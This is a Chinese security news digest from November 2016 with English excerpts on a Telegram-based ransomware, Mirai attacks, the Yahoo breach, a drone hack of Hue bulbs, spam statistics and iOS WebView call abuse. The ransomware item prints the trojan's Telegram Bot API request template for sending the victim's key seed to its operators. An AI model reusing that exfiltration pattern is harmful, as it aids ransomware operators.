每日安全简讯(20161111)

1、研究人员发现首个利用电报协议的恶意软件
2、恶意软件Mirai被曝曾攻击美国候选人网站
3、雅虎对其受大规模攻击事件透露更多细节
4、研究者用无人机远程控制飞利浦智能灯泡
5、安全厂商发布Q3垃圾邮件和网络钓鱼报告
6、研究人员发现可通过iOS WebView拨打电话

【安天】搜集整理（来源：securelist、itproportal、securityweek、solidot、securelist、securityweek）

1、研究人员发现首个利用电报协议的恶意软件
标题：The first cryptor to exploit Telegram

作者信息：November 8, 2016. 10:52 am By Anton Ivanov, Fedor Sinitsyn

//BEGIN
Earlier this month, we discovered a piece of encryption malware targeting Russian users. One of its peculiarities was that it uses Telegram Messenger’s communication protocol to send a decryption key to the threat actor. To our knowledge, this is the first cryptor to use the Telegram protocol in an encryption malware case.
What is a cryptor?
In general, cryptors can be classified into two groups: those which maintain offline encryption and those which don’t.
There are several reasons why file encryption malware requires an Internet connection. For instance, the threat actors may send an encryption key to the cryptor and receive data from it which they can later use to decrypt the victim’s encrypted files.
Obviously, a special service is required on the threat actor’s side to receive data from the cryptor malware. That service must be protected from third-party researchers, and this creates extra software development costs.
俄罗斯的即时通信用户又尝鲜了：其常用的即时聊天工具Telegram Messenger被用来作为勒索用户的工具和管道了：本月卡巴的安全研究人员首次发现了利用开源的Telegram Messenger的通信协议传递加密秘钥的恶意代码。
加密密码一般分为两种，一种是在线的一种是离线的。目前流行的恶意代码都喜欢采用在线的加密的方式。

//END
Analyzing the Telegram Trojan
The Telegram Trojan is written in Delphi and is over 3MB in size. After launching, it generates a file encryption key and an infection ID (infection_id).
Then it contacts the threat actors using the publicly available Telegram Bot API and operates as a Telegram bot, using the public API to communicate with its creators.
In order for that to happen, the cybercriminals first create a “Telegram bot”. A unique token from the Telegram servers identifies the newly-created bot and is placed into the Trojan’s body so it can use the Telegram API.
The Trojan then sends a request to the URL https://api.telegram.org/bot<token>/GetMe, where <token> the unique ID of the Telegram bot, created by the cybercriminals, is stored. According to the official API documentation, the method ‘getMe’ helps to check if a bot with the specified token exists and finds out basic information about it. The Trojan does not use the information about the bot that the server returns.
The Trojan sends the next request using the method ‘sendMessage’ which allows the bot to send messages to the chat thread of the specified number. The Trojan then uses the chat number hardwired into its body, and sends an “infection successful” report to its creators:
https://api.telegram.org/bot<token>/sendmessage?chat_id=<chat>&text=<computer_name>_<infection_id>_<key_seed>
The Trojan sends the following parameters in the request:
<chat> – number of the chat with the cybercriminal;
<computer_name> – name of the infected computer;
<infection_id> – infection ID;
<key_seed> – number used as a basis to generate the file encryption key.
After sending the information, the Trojan searches the hard drives for files with specific extensions, and encrypts them bytewise, using the simple algorithm of adding each file byte to the key bytes.
该勒索木马采用Dephi语言编写，木马的大小为3MB。一旦启动就会产生一个唯一的加密文件的密码以及一个感染的ID密码:token。随后该勒索木马就会通过Telegram Messenger的公开的API接口与木马的制作者进行联系。用这个感染的ID密码来识别感染的用户。加密文件选择的是用户可能有价值的文档文件，11种文档类型为doc,docx,xls,xlsx,jpg,jpeg,png,dt,dbf,cd以及pdf。而加密的方式则是一个字节一个字节加密文件，当然只是简单的给每个原始文件的单个字节增加一个密数。

点评：Telegram Messenger虽然号称是最安全的即时聊天工具之一，而正是由于其同时的开源特性，可以被勒索软件通过建立僵尸站点的方式利用起来诈骗用户。

2、恶意软件Mirai被曝曾攻击美国候选人网站
标题：Mirai malware was used in attacks on US candidates' sites

作者信息：2016-11-09 By Anthony Spadafora

//BEGIN
The security firm Flashpoint has revealed that the Mirai malware was used in attacks which aimed to take down the sites of candidates ahead of the US presidential election.
Leading up to the US presidential election, hackers did try to take down the campaign sites of Hilary Clinton and Donald Trump using the Mirai malware, ultimately being unsuccessful.
Security firm Flashpoint has revealed that four separate 30-second HTTP Layer 7 attacks were launched against the websites of both opponents between 6-7 November. Due to the fact that more hackers have begun to utilise the Mirai botnet, none of the attacks were able to bring either site offline.
有安全公司的研究人员称，在今年的美国总统大选前，其候选人网站曾经遭遇到过Mirai（未来）物联网恶意代码的DDOS攻击，具体网站就是总统候选人Hilary Clinton和Donald Trump两位，
当然最后只是没有成功。而在本月6到7号期间，研究人员还发现了四组不同的来自7层HTTP协议的30秒攻击，由于Mirai的僵尸网络被更多的黑客知晓，因此他们要想达到目标还是很难的。

//END
When the source code for the Mirai malware was released online it appeared as though it would give cybercriminals an edge when it came to launching large-scale DDoS attacks. Now though, the opposite appears to be true as they have all begun to compete for connected devices to aid in their attacks.
虽然Mirai的源码泄露导致了更多的黑客可以利用那些被控的IoT物联网设备，然而现实情况却并没有想象中的糟糕，其原因就在于对一定数量的受控IoT设备争夺控制权，引发了黑客们之间的争夺，导致最后的现实攻击的流量没有想象中的巨大。

点评：Mirai继续....

3、雅虎对其受大规模攻击事件透露更多细节
标题：Yahoo Reveals More Details About Massive Hack

作者信息：November 10, 2016 By AFP

//BEGIN
Yahoo provided more details on Wednesday about an epic hack of its services, including that the culprits may have planted software "cookies" for ongoing access to users' accounts.
In revelations that could jeopardize the company's pending $4.8 billion acquisition by US telecom giant Verizon, the internet pioneer said it was trying to pin down when it first knew its system had been breached and whether hackers gave themselves a way to get back into accounts whenever they wished.
曾经导致其5亿用户电子邮件泄露的老牌互联网公司YAHOO本周三提供了更多的细节，以阐述黑客们是如何利用Cookies开盗取用户账号信息的。该信息的披露影响了电信巨头收购YAHOO进程。原本电信巨头VERIZON想以48亿美金的价格收购YAHOO的。为了让公众知晓更多的细节，昔日的互联网巨头YAHOO准备披露其是何时知道其2014年信息遭到大规模泄露的；以及是否黑客们能自由进入用户的信箱。

//END
A Verizon executive overseeing the purchase of Yahoo said last month that the deal was moving ahead pending the outcome of an investigation into the hack.
"We are not going to jump off a cliff blindly, but strategically the deal still does make sense to us," Verizon executive vice president Marni Walden said at a technology conference in California.
"What we have to be careful about is what we don't know." He declined to comment on what information or circumstances might cause Verizon to walk away from the deal inked in July.
The company said earlier this month that the breach affecting Yahoo customers could have a "material" effect on the acquisition. Yahoo also warned of the possibility in its filing.
The use of the term "material" suggests a substantive change in Yahoo's value that was not previously known, and which could allow the telecom group to lower its offer or scrap the deal.
电信的收购执行层已经暂停，直到该事件得到澄清。“虽然我们会谨慎行事，但是公司还是认为收购YAHOO具有战略意义。”这是VERIZON的一个副总裁在一个大会上发表的意见。“我们更关心的是还有哪些事情是我们以前不知道的。”他拒绝评论究竟是什么原因导致VERIZON在今年7月份暂停了收购YAHOO的后续动作。但泄露事件非常可能导致收购价格的降低。

点评：曾经沧海难为水。

4、研究者用无人机远程控制飞利浦智能灯泡
{CHN}
标题：研究人员利用无人机远程控制飞利浦的智能灯泡

作者信息：2016年11月09日 20时39分 星期三 By pigsrollaroundinthem

//BEGIN
研究人员利用无人机远程控制了部分飞利浦 Hue 智能照明系统。研究人员利用了 ZigBee Light Link Touchlink 系统中的漏洞。ZigBee就此发表声明称，漏洞与ZigBee协议本身无关，而是存在于供应商的协议实现中。利用漏洞，研究人员能绕过禁止远程访问网络的保护措施，安装恶意的固件，让照明系统一闪一闪的发出摩尔斯码的S-O-S。研究人员甚至能屏蔽未来的无线更新，使得感染无法逆转。除了拆开照明系统没有其它方法能重编程感染的设备。飞利浦公司已经在上个月释出了修复该漏洞的补丁。

//END
Researchers hack Philips Hue smart bulbs from the sky
Send in the drones.
Ian Paul
Ian Paul | @ianpaul
Contributor, TechHive Nov 7, 2016 8:36 AM
Security researchers in Canada and Israel have discovered a way to take over the Internet of Things (IoT) from the sky.

Okay, that’s a little dramatic, but the researchers were able to take control of some Philips Hue lights using a drone. Based on an exploit for the ZigBee Light Link Touchlink system, white hat hackers were able to remotely control the Hue lights via drone and cause them to blink S-O-S in Morse code.
The drone carried out the attack from more than a thousand feet away. Using the exploit, the researchers were able to bypass any prohibitions against remote access of the networked light bulbs, and then install malicious firmware. At that point the researchers were able to block further wireless updates, which apparently made the infection irreversible.
“There is no other method of reprogramming these [infected] devices without full disassemble (which is not feasible). Any old stock would also need to be recalled, as any devices with vulnerable firmware can be infected as soon as power is applied,” according to the researchers.
The researchers notified Philips of the vulnerability. The company then delivered a patch for it in October, according to The New York Times.
Why this matters: The ability to attack Philips Hue lighting doesn’t sound all that menacing and more of an inconvenience than anything else. The obvious exception to that would be using the lights to trigger epileptic seizures in vulnerable people, or plunging properties into darkness.
Shedding light on a deeper issue
The bigger issue is that security researchers worry exploits like these could be used to infect devices with a computer worm. That worm could then move on to attack other IoT devices on the same network. The researchers argue this kind of attack could be used to take over a building or an area with a high concentration of connected devices within minutes. All the hacker would have to do is hover over a building with a drone or drive past an area with a computer searching for vulnerable devices.
Taking over massive numbers of IoT devices may sound like alarmist nonsense, but it’s really not that hard to believe. Just a few weeks ago, an IoT botnet was responsible, at least in part, for the major DDoS attack that caused disruptions to U.S. Internet traffic.
Over the past few months, it’s become increasingly clear that while we may be ready to put networked light bulbs, thermostats, and door locks on our homes, the security for many of these devices is still sub-optimal.
http://www.pcworld.com/article/3 ... s-from-the-sky.html
这些研究人员来自加拿大和以色列两个国家，这里的飞利浦灯泡是类似感染Mirai摄像头等的物联网设备。无人机的攻击可以从1000英尺外对灯泡发起。研究人员建议生产厂家召回所有的相关物联网灯泡，进行重新修补。因为一旦进入市场，再召回就更加麻烦和困难了。
按照纽约时报的报道，涉事的飞利浦公司已经在2016年10月份修复了该漏洞。

点评：原来不只Mirai未来一个物联网感染恶意软件，将来还或许更多.

5、安全厂商发布Q3垃圾邮件和网络钓鱼报告
标题：Spam and phishing in Q3 2016

作者信息：November 9, 2016. 10:00 am By Darya Gudkova, Maria Vergelis, Nadezhda Demidova

//BEGIN
Spam: quarterly highlights

Malicious spam

Throughout 2016 we have registered a huge amount of spam with malicious attachments; in the third quarter, this figure once again increased significantly. According to KSN data, in Q3 2016 the number of email antivirus detections totaled 73,066,751. Most malicious attachments contained Trojan downloaders that one way or another loaded ransomware onto the victim’s computer.
垃圾邮件2016年第三季度报告显示很多数量的恶意代码都是随着垃圾邮件进入用户的计算机的。光第三季度含有恶意代码的垃圾邮件达到7300多万之多。这些恶意附件含有的木马其中大部分是与勒索软件相关。

//END
Conclusion

In the third quarter of 2016, the proportion of spam in email traffic increased by 2 p.p. compared to the previous quarter and accounted for 59.19%. The largest percentage of spam – 61.25% – was registered in September. India (14.02%), which was only fourth in the previous quarter, became the biggest source of spam. The top three sources also included Vietnam (11.01%) and the US (8.88%).
The top three countries targeted by malicious mailshots remained unchanged from the previous quarter. Germany (13.21%) came first again, followed by Japan (8.76%) and China (8.37%).
In Q3 2016, Kaspersky Lab products prevented over 37.5 million attempts to enter phishing sites, which is 5.2 million more than the previous quarter. Financial organizations were the main target, with banks the worst affected, accounting for 27.13% of all registered attacks. The most attractive phishing targets in Q3 2016 were clients of four banks located in Brazil.
结论是2016年的第三季度中，垃圾邮件在整个邮件中的比例与上个季度相比增加了2%达到了接近60%。而且9月份的比例最高，超过了60%。上个季度还占第4位的印度这个季度占比排名第一位，其比例达到14%多。前三名中还有越南、美国等。而邮件中的恶意代码排行与上月相比没有变化，国家依次是德国、日本和中国。从网站类型的角度看，网银是重灾区。网银钓鱼中占比最多的是巴西。

//下载： Spam-report_Q3-2016_final_ENG.pdf (3.43 MB, 下载次数: 32)

2016-11-11 14:26 上传

点击文件名下载附件

文件名：Spam-report_Q3-2016_final_ENG.pdf
文件大小：3，593，298 bytes
MD5     : EFA18058696D263095C50CE60C460296

点评：勒索+在行动....

6、研究人员发现可通过iOS WebView拨打电话
标题：Hackers Can Abuse iOS WebView to Make Phone Calls

作者信息：November 10, 2016 By Eduard Kovacs

//BEGIN
The iOS applications of Twitter, LinkedIn and possibly other major vendors can be abused by hackers to initiate phone calls to arbitrary numbers. The attacker can also prevent the victim from ending the call.
Security researcher Collin Mulliner said the cause of the flaw is related to WebView and how the component is handled by some iOS applications. WebView is a browser integrated into mobile apps. It allows developers to build their apps with web technologies, and it’s often used to display web pages inside an application without the need for third-party browsers.
安全研究人员发现iOS系统的应用程序存在WebView漏洞，利用这个漏洞黑客可以拨打任意电话，而且能设置为用户不能终止。这些存在漏洞的iOS应用程序包括Twitter,LinkIn等很多知名应用。WebView是一个嵌入到移动应用中的浏览器，有了它开发者可以用来构造其自身的APP应用程序，通常的功能是用来显示一些WEB页面，而不需要一些第三方的浏览器的支持。


//END

Mulliner started investigating the issue after hearing the story of an 18-year-old teen from Arizona who used a similar exploit to “prank” his friends. However, the teen ended up being arrested because he unknowingly used an exploit designed to trigger calls to 911, causing disruptions to emergency services in his area.
Mulliner provided other examples of serious attacks that can be carried out using this type of exploit.
“DoSing 911 is pretty terrible but there are other examples such as expensive 900 numbers where the attacker can actually make money. A stalker can make his victim dial his phone number so he gets his victim's number. Altogether things you don't want to happen,” he said.
一个18岁的年青人因为炫耀其发现了这个漏洞，并利用其拨打911导致被捕。当然不光是拨打911,还可以用来拨打昂贵的900电话，并从中牟利。更有恶意者可以通过受害者拨打电话，而自动知晓对方的号码，有了电话号码，后面就能干很多事情了。

点评：浏览网页的组件能被利用打电话，用户还不能挂断，还是有点奇怪的.....